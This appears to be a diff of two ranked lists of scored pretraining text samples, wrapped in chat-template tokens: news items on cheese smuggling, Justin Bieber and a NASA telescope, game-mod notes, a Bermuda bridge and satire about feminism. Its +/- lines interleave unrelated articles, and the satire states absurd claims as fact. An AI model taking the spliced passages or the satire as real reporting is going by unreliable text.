questioned Purdie, he offered up Langelaan, a sergeant at the time and making well over $100,000 a year, as a fellow smuggler. + +But instead of smuggling steroids, court heard, Langelaan’s preference was cheese and chicken wings. + +No one was interested in the poultry, court heard, but Langelaan, a resident of Fort Erie, sold the cheese to restaurants in Aylmer and Dorchester, Ont., at a profit of more than $50,000. + +Lawyer Paul O’Marra described his client as a "highly respected officer" whose reputation has taken a “major hit” because of the crimes. + +O’Marra said Langelaan has also suffered a blow to his pocketbook. + +Canada Borders Services Agency wants him to pay a penalty of $50,000, almost three times the amount of duties and taxes the former cop didn’t pay at the border. That matter is subject to civil litigation. + +His taxes were also re-assessed. + +Two other people were arrested as a result of the investigation that revealed more than $200,000 worth of cheese had been purchased in the U.S. and distributed in Canada. Const. Scott Herron and Bernie Pollino are scheduled to appear in court Dec. 12. + +According to the CBSA, travellers can bring back, duty free, $20 or 20 kilograms in total (whichever limit is reached first) of dairy ================================================================================ -Rank = 18; Score = 8290304.0 +Rank = 23; Score = 4128768.0 <|begin_of_text|>Version History 1.8.5: @@ -442,115 +531,141 @@ Rank = 18; Score = 8290304.0 1.0 Release1.1 Added the LAW and M79, the LAW will replace the RPG sounds1.2 Added the menu sounds as well as the perk level up sound, added the closed beta wave start sound as well some extra sounds on the trader menu and scoreboard, added the classic headshot sounds1.3 Fixed missing pump sounds on the trench gun, fixed missing sounds with the level action rifle1.4 Added the badass Z.E.D. gun to replace the Rail Gun and added the Flamethrower too1.4.5 Quick hotfix about that the flamethrower was missing, thats now fixed1.5 Improved the headshot sounds. Added some better bullet hits sounds. Improved the explosions sounds. Also the classic crawler might return too1.6 Added the thompson to replace the P90, added the classic katana sounds, Added the classic crawler1.7 Added the Pipe Bomb sounds to replace the C4, improved the headshot sound effects1.8 Fixed some missing sounds on the new Tacticool Winchester, Added the KSG sounds to replace the new shotgun, the HZ12- Updated the footstep sounds as well as added landing sounds when jumping (Just like in KF1, wow, i wish they added that to the base game)- Replaced the sounds of the stoner LMG (hope you guys like it)- Removed the xmas gorefast sounds (Because no one likes it)- Added classic's patriach minigun sound and rockets- Changed the melee hit sounds- Replaced the husk weapon sounds to its old ones- Changed the bullet impacts with the ones from KF1- Added the old darts sounds from the medic weapons- Added the old Seeker Six sounds- Replaced the Hemoglobin sounds- Replaced UMP-45 sounds- Fixed headshot sounds- Added the Mac-10- Added the Husk cannon- Added the M99- Added the Quad Shotgun- Fixed the M1911 and MB500 sounds- Replaced the AF2011- Replaced the FNFAL, MKB42 and HMTECH 501Enjoy everyone!- ================================================================================ -Rank = 19; Score = 8159232.0 -<|begin_of_text|>What is feminism? In this exclusive extract from A Book For Her, the standup comedian tells you everything you need to know about the movement that is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and pedantic health and safety regulations +Rank = 24; Score = 4112384.0 +<|begin_of_text|>Somerset Bridge is a small bridge located in the western parish of Sandys, in Bermuda, connecting Somerset Island with the mainland. The stone bridge is walled solid, save for a narrow arch near one of its banks that allows small boats to pass underneath. There is enough headroom for a motorboat to pass through comfortably but not a sailboat. To allow a sailboat with a tall mast to squeeze through, a section of the motorway over the arch was replaced with wooden planks that could be raised creating a mini drawbridge. This section is just 32 inches wide, and is widely believed to be the smallest working drawbridge in the world. -Facebook Twitter Pinterest Bridget Christie: ‘I even hate Ban Ki-moon.’ Photograph: David Levene/Guardian +Photo credit -I am a feminist. All this means is that I am extremely hairy and hate all men, both as individuals and collectively, with no exceptions. Nope. Not even Laurence Llewelyn-Bowen/Paul Hollywood/Ronnie Corbett/Trevor McDonald/David Attenborough or John Nettles circa Bergerac are good enough for me. +The original bridge dates back to 1620, and although the bridge was largely rebuilt in the mid 20th century, much of the original stonework remains. The bridge was originally raised using a hand crank, but now consist of two cantilevered half-spans made of thick timber panels. The panels can be grabbed by the sides and lifted to create a narrow gap just wide enough for the mast of a sailboat to pass through. Judging by the size of the gap, I believe it takes a fair amount of skill to navigate the gap without mishap. Often a sailor has to be assisted in opening the drawbridge and making the passage safely, so it’s not uncommon to find sailboat captains calling upon pedestrians for help. -I even hate Ban Ki-moon. It’s one thing to try to eradicate female genital mutilation and forced marriage, but Mrs Ban Ki-moon told me she can’t remember the last time her husband put the Hoover round. Or sprayed his own soiled pants with pre-wash Vanish. Feminism begins at home, Mr Ban, not at the UN. Huh! Ban Ki-hypocrite, more like. +Although not quite an attraction, the bridge’s unique reputation has earned it a place on the reverse of Bermuda’s $20 bills issued in 2009. -Feminists don’t like humour, except slapstick. Charlie Chaplin, Harold Lloyd, Laurel and Hardy and Bottom are all very popular at feminist comedy nights. Anything that involves men being physically harmed always goes down very well with feminists. They also enjoy watching Tom and Jerry, Road Runner cartoons and war documentaries. +Photo credit -Feminists never have sex and hate men opening doors for them, even into other dimensions. +Photo credit -Christmas is banned in the “feminist community”, along with birthdays, wallpaper, nuance, giving people the benefit of the doubt and all music. Feminists only ever listen to one song, on a loop: kd lang’s Constant Craving. +Photo credit -All feminists are lesbians. There is not a single heterosexual woman in the world who believes that women should have equal rights. Not one. If a feminist says she is heterosexual or bisexual or asexual, she is lying. They are all lesbians. +Photo credit -Feminism is the sole cause of the recession, global warming, terrorism, pandemics, cancelled flights, volcanos, delayed trains and overly pedantic health and safety regulations. You can’t have hot drinks at work now because of feminism, or climb up small stepladders in libraries. You can’t eat a lobster without safety goggles now because of feminists. You can’t even open a door now because of -================================================================================ -Rank = 20; Score = 8060928.0 -<|begin_of_text|>ST. CATHARINES, ONT. +Photo credit -A disgraced Niagara Regional Police officer has been fined $15,000 for his part in a scheme that involved smuggling copious quantities of cheese and chicken wings across across the border. +Photo credit -Casey Langelaan, 49, resigned from the police service last year after he was caught up in a large-scale smuggling operation that saw thousands of dollars worth of U.S. cheese and chicken wings smuggled into Canada and sold to Ontario restaurants. +Photo credit -"A man of otherwise good character has been embarrassed and shamed in his community," Judge David Harris said Friday after Langelaan pleaded guilty in a St. Catharines, Ont., courtroom to charges of evading compliance with the Canada Customs Act and possession of imported goods. +Sources: Bermuda4u / Wikipedia<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 25; Score = 3964928.0 +<|begin_of_text|>Still image from video of Justin Bieber during a DUI test at the Miami Beach Police Station. -Court heard the investigation began in January 2012 and involved Niagara police, U.S. Department of Homeland Security, and the Canada Border Services Agency. +MIAMI (CBSMiami) – Video of Justin Bieber captured shortly after his arrest on Miami Beach shows the pop star submitting to a sobriety test in which he appears to momentarily lose his balance while attempting to walk along a straight white line. -The investigation initially focused on the cross-border activities of another NRP officer, Const. Geoff Purdie, who is now serving time behind bars in an American jail for smuggling steroids into Canada. +In the clip from the holding area of the Miami Beach Police Department, part of more than 9 hours of video released Wednesday, Bieber is walking heel to toe when he slightly stumbles as he turns. He starts the walk over again. -When investigators questioned Purdie, he offered up Langelaan, a sergeant at the time and making well over $100,000 a year, as a fellow smuggler. +Bieber then removes several items of clothing for a pat down. -But instead of smuggling steroids, court heard, Langelaan’s preference was cheese and chicken wings. +He’s eventually led to a holding cell where he waits for a couple hours before eventually being transported via van to jail. -No one was interested in the poultry, court heard, but Langelaan, a resident of Fort Erie, sold the cheese to restaurants in Aylmer and Dorchester, Ont., at a profit of more than $50,000. +The embattled entertainer can be seen doing push-ups and pacing in the small space while he waits. -Lawyer Paul O’Marra described his client as a "highly respected officer" whose reputation has taken a “major hit” because of the crimes. +The videos do not contain audio. -O’Marra said Langelaan has also suffered a blow to his pocketbook. +Attorneys for CBS4 and its news partner the Miami Herald, along with attorneys for media outlets including CNN and the Associated Press, went to court last week to argue that since the tapes have been turned over to the defense as part of the discovery process in the case; the videos are now public record, and open to being viewed in their entirety. -Canada Borders Services Agency wants him to pay a penalty of $50,000, almost three times the amount of duties and taxes the former cop didn’t pay at the border. That matter is subject to civil litigation. +Tuesday, Bieber’s defense team said they did not object to prosecutors releasing most of the video footage with the exception of five video clips which may show the 19-year old pop star urinating into a cup for a drug test. -His taxes were also re-assessed. +Web Extra: Surveillance Video Recorded In Miami Beach Police Department Following Justin Bieber’s Arrest -Two other people were arrested as a result of the investigation that revealed more than $200,000 worth of cheese had been purchased in the U.S. and distributed in Canada. Const. Scott Herron and Bernie Pollino are scheduled to appear in court Dec. 12. +As for the five disputed video clips, Judge William Altfield will view them, and review more court filings, before announcing his decision on March 4th. -According to the CBSA, travellers can bring back, duty free, $20 or 20 kilograms in total (whichever limit is reached first) of dairy +Police stopped Bieber and singer Khalil Amir Sharieff on January 23rd after what they said was an illegal street drag race involving exotic cars. + +Breath tests showed that Bieber’s blood-alcohol content was below the.02 legal limit for underage drivers, but toxicology tests revealed the presence of the active ingredient in marijuana and the antidepressant Xanax. + +Bieber has pleaded not guilty to driving under the influence, resisting arrest and invalid-license charges.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 21; Score = 7700480.0 -<|begin_of_text|>Advertisement Here's what your next license will look -- and feel -- like Several new security features being added Share Shares Copy Link Copy +Rank = 26; Score = 3899392.0 +<|begin_of_text|>FEATURED ARTICLE -Changes are coming to your wallet. Massachusetts is making several changes to the look and feel of driver's licenses.Starting on July 24, the Registry of Motor Vehicles will begin issuing licenses with new design and security features. Every license in the state will be upgraded to the new design within five years, as they expire.New features include raised lettering, similar to a credit card, laser perforations, ultraviolet ink and several secure background designs. Background images include the golden dome of the State House, the memorial to Robert Gould Shaw and the Massachusetts 54th Regiment, the state bird and the state flower."The new licenses and ID cards are among the most secure and technologically advanced in all of North America," the RMV said. The security upgrades will also be applied to identification cards, liquor identification cards, junior operator licenses and under 21 driver's licenses.Get the WCVB News App<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Organizers of the former Montreal Anarchist Bookfair are celebrating their new identity after they renamed themselves The Bourgeois Feminist Bookfair. “We realized that we’re not an anarchist collective after all,” says activist and bourgeois neo-liberal feminist Lucy Descharnes. “We don’t care about anarchism, we don’t care about the working class, and we don’t care about economic issues. Our main interest is in protecting the privileges of wealthy university graduates, so we decided to change the name of our organization to better reflect our actual values. We’re bourgeois, we're educated, we're affluent, and we're proud of it."Anarchists across Montreal say that they’re not surprised by the name change. “I can’t remember the last time the anarchist bookfair actually catered to genuine anarchists,” says working class activist Jesse Hogan. “It’s been a giant bourgeois shit show for the last decade. Last year took the cake, though, after they gave white and affluent academic feminists the power to ban men from attending the event. Seriously, if a wealthy educated feminist didn’t like you, you couldn’t attend. All she had to say was that you made her feel uncomfortable. The organizers justified their actions because they believe that working class men have more power and privilege than bourgeois feminists. I’m not comfortable with bourgeois feminists being anywhere near me, but the bookfair doesn’t care about creating a safe space for the working class. Safe spaces only exist to protect the bourgeoisie from the rabble."Lucy agrees. “At the end of the day, a wealthy white woman with a Ph.D from Concordia is far more oppressed than a working class man who was born into poverty,” says Lucy. “At the Bourgeois Feminist Bookfair, we believe in intersectional feminism, which is the religious conviction that oppressions intersect in a way that minimizes and erases class privilege. For example, if you’re a poor homeless man, your penis gives you way more privilege than Martha Stewart or Michelle Obama. A homeless man’s male privilege intersects with his poverty, erasing it’s very existence from the face of the earth. Bourgeois feminists recognize that class is irrelevant — it’s the least important factor in oppression. We also believe in the one drop rule: if you have a single drop of non-economic privilege, that privilege erases the economic factors in your life. You’re white? Your class doesn’t matter. You're a man? Your class doesn’t matter. You’re straight? ================================================================================ -Rank = 22; Score = 7536640.0 -<|begin_of_text|>If Benjamin Franklin had had his way, America's national animal would be the turkey, an animal he called "a true original Native of America." +Rank = 27; Score = 3883008.0 +<|begin_of_text|>NASA’s next major space observatory is meant to tackle some of the biggest questions in astronomy when it launches in 2025—including what exoplanets look like and how dark energy is driving the Universe’s expansion. But the project’s cost is rising quickly, and NASA managers are struggling to keep its budget in check. -And in his defense, there's certainly no shortage of turkeys to go around, which can't be said about a handful of countries around the globe with national animals that are decidedly less common — some even extinct. Other countries proudly boast emblematic critters that are straight-out bizarre, and, in some cases, mythical. +The Wide-Field Infrared Survey Telescope (WFIRST) has grown in scope and complexity since it was proposed nearly a decade ago, and its price has swollen from US$1.6 billion in 2010 to the current estimate of $3.2 billion ($2.4 billion in 2010 dollars). That has raised concern at NASA, which in April commissioned a review by independent aero-space experts. Their report is due in the next few months. -From the dodo to the Komodo dragon to folkloric winged horses, we've assembled a motley menagerie of unusual and/or threatened national animals to consider. +Above all, the agency wants to keep WFIRST from following the path of the James Webb Space Telescope (JWST), a successor to the Hubble telescope that is scheduled to launch in 2018. That project’s cost spiralled from $1 billion in the early 2000s to $8.8 billion—and nearly exhausted NASA’s astrophysics budget. -1. Unicorn (Scotland) +The WFIRST review is meant to stave off that kind of meltdown. “This is a good time to take a look at the scale and scope of the mission,” says Jon Morse, a former head of NASA’s astrophysics division who is now chief executive of the BoldlyGo Institute, a non-profit space-exploration organization in New York City. “Nobody wants this thing to double in cost.” -Despite its mythical and occasionally sparkly depiction, the unicorn represents purity, strength and independence. (Photo: godam07/Shutterstock) +Bonus features -It's a creature that's majestic, mythical and possesses the singing voice of Mia Farrow. It appears (chained) on the Royal Coat of Arms and is a symbol of purity, strength and independence. It's also often covered in glitter and found in close proximity to magical rainbows. How could anyone take issue with the national animal of Scotland being a unicorn? +WFIRST was the top-ranked big space mission in the 2010 decadal survey in astronomy and astrophysics, a list created by researchers to prioritize projects for the next ten years. Then the National Reconnaissance Office gave NASA a 2.4-metre mirror—replacing WFIRST’s planned 1.5-metre mirror—and the space agency started dreaming big. The larger mirror allowed NASA to add a corona-graph, an instrument that studies exoplanets by blocking light from the stars they orbit. -Shocking but true, a small but vocal group of Scots want to do away the unicorn, the heraldic symbol of Scotland that's also served as the country's national animal since the late 1300s. And what do these campaigners suggest take the unicorn’s place? They're pushing for another elusive beast to be named as Scotland's national animal, this one they believe to be real (at least for tourism purposes): the Loch Ness Monster. Their argument for the unicorn to be replaced by a lake-dwelling cryptid that's most likely a very large catfish? "How many people visit Scotland to look for unicorns? Exactly." +And NASA made other design changes to go along with the big mirror. It also began to consider adding a ‘starshade’, a free-floating umbrella-like spacecraft that would fly alongside WFIRST and block enough light for the telescope to spy Earth-sized planets. -2. Dodo (Mauritius) +WFIRST’s heart is a gigantic camera with 18 detectors, each capable of capturing a 16-mega-pixel shot—giving it a field of view 200 times Hubble +================================================================================ +Rank = 28; Score = 3817472.0 +<|begin_of_text|>Cleveland, OH–The Cleveland Indians today announced pregame festivities for ALCS Game 1 at Progressive Field on Friday, with first pitch set for 8PM. -The extinct dodo lives on through museums, stamps and statues in Mauritius. (Image: Biodiversity Heritage Library/flickr) +The club is encouraging all fans to #RockRed Tribe gear throughout the ALCS to help maintain the Indians incredible home-field advantage against the Blue Jays. The Indians were 53-28 at Progressive Field this season, second-best in baseball, and won two straight against Boston last weekend. -When you're a small island nation in the Indian Ocean and your most famous endemic bird is also the poster-animal for extinction, of course that bird would be your national animal. And although the dodo went, well, the way of itself circa 1662, the curious-looking flightless bird remains both a symbol of Mauritian pride and a potent reminder of the plight of endangered species across the globe threatened by human activity. +Postseason coverage on SportsTime Ohio starting with Drennan Live at 6 p.m. Friday and then Indians Live postgame following the final pitch -Although the story of the dodo — a cautionary national animal if there ever was one — is tragic -================================================================================ -Rank = 23; Score = 7471104.0 -<|begin_of_text|>FEATURED ARTICLE +Indians Hall of Famer Andre “Thunder” Thornton will throw Friday’s ceremonial first pitch. Thornton hit 214 homers over 10 seasons with the Tribe. -Organizers of the former Montreal Anarchist Bookfair are celebrating their new identity after they renamed themselves The Bourgeois Feminist Bookfair. “We realized that we’re not an anarchist collective after all,” says activist and bourgeois neo-liberal feminist Lucy Descharnes. “We don’t care about anarchism, we don’t care about the working class, and we don’t care about economic issues. Our main interest is in protecting the privileges of wealthy university graduates, so we decided to change the name of our organization to better reflect our actual values. We’re bourgeois, we're educated, we're affluent, and we're proud of it."Anarchists across Montreal say that they’re not surprised by the name change. “I can’t remember the last time the anarchist bookfair actually catered to genuine anarchists,” says working class activist Jesse Hogan. “It’s been a giant bourgeois shit show for the last decade. Last year took the cake, though, after they gave white and affluent academic feminists the power to ban men from attending the event. Seriously, if a wealthy educated feminist didn’t like you, you couldn’t attend. All she had to say was that you made her feel uncomfortable. The organizers justified their actions because they believe that working class men have more power and privilege than bourgeois feminists. I’m not comfortable with bourgeois feminists being anywhere near me, but the bookfair doesn’t care about creating a safe space for the working class. Safe spaces only exist to protect the bourgeoisie from the rabble."Lucy agrees. “At the end of the day, a wealthy white woman with a Ph.D from Concordia is far more oppressed than a working class man who was born into poverty,” says Lucy. “At the Bourgeois Feminist Bookfair, we believe in intersectional feminism, which is the religious conviction that oppressions intersect in a way that minimizes and erases class privilege. For example, if you’re a poor homeless man, your penis gives you way more privilege than Martha Stewart or Michelle Obama. A homeless man’s male privilege intersects with his poverty, erasing it’s very existence from the face of the earth. Bourgeois feminists recognize that class is irrelevant — it’s the least important factor in oppression. We also believe in the one drop rule: if you have a single drop of non-economic privilege, that privilege erases the economic factors in your life. You’re white? Your class doesn’t matter. You're a man? Your class doesn’t matter. You’re straight? -================================================================================ -Rank = 24; Score = 7340032.0 -<|begin_of_text|>Somerset Bridge is a small bridge located in the western parish of Sandys, in Bermuda, connecting Somerset Island with the mainland. The stone bridge is walled solid, save for a narrow arch near one of its banks that allows small boats to pass underneath. There is enough headroom for a motorboat to pass through comfortably but not a sailboat. To allow a sailboat with a tall mast to squeeze through, a section of the motorway over the arch was replaced with wooden planks that could be raised creating a mini drawbridge. This section is just 32 inches wide, and is widely believed to be the smallest working drawbridge in the world. +Gates will open at 6PM, and fans are encouraged to be in their seats by 7:30PM at the latest to enjoy all pregame festivities. -Photo credit +Each fan will receive a red #RallyTogether towel upon entering Progressive Field. -The original bridge dates back to 1620, and although the bridge was largely rebuilt in the mid 20th century, much of the original stonework remains. The bridge was originally raised using a hand crank, but now consist of two cantilevered half-spans made of thick timber panels. The panels can be grabbed by the sides and lifted to create a narrow gap just wide enough for the mast of a sailboat to pass through. Judging by the size of the gap, I believe it takes a fair amount of skill to navigate the gap without mishap. Often a sailor has to be assisted in opening the drawbridge and making the passage safely, so it’s not uncommon to find sailboat captains calling upon pedestrians for help. +Pregame festivities include Tom Hamilton as emcee, Budweiser activation, Cleveland students manning American flag on field during anthem -Although not quite an attraction, the bridge’s unique reputation has earned it a place on the reverse of Bermuda’s $20 bills issued in 2009. +The Indians will have a number of festivities for fans prior to Thursday’s game. -Photo credit +Other festivities include: -Photo credit +· Tom Hamilton will emcee on-field pregame festivities -Photo credit +· Veteran local singer Danielle Danburg will sing the American and Canadian national anthems; Dan Polk will sing “God Bless America” during the seventh inning -Photo credit +· Cleveland Metropolitan School District students and staff will volunteer to man a giant American flag on field for the anthem -Photo credit +· Color guards from the Army, Navy, Marines, Air Force and Coast Guard will present the colors -Photo credit +· Budweiser will bring its ‘Bud and Burgers’ trailer to Gateway Plaza, where fans over the age of 21 can enjoy Budweiser products up until game time; Swenson’s Food Truck also will be on hand -Photo credit +· The “Mike Trivisonno Show” will broadcast live from the main concourse (near The Corner) from 3-7:30PM -Sources: Bermuda4u / Wikipedia<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|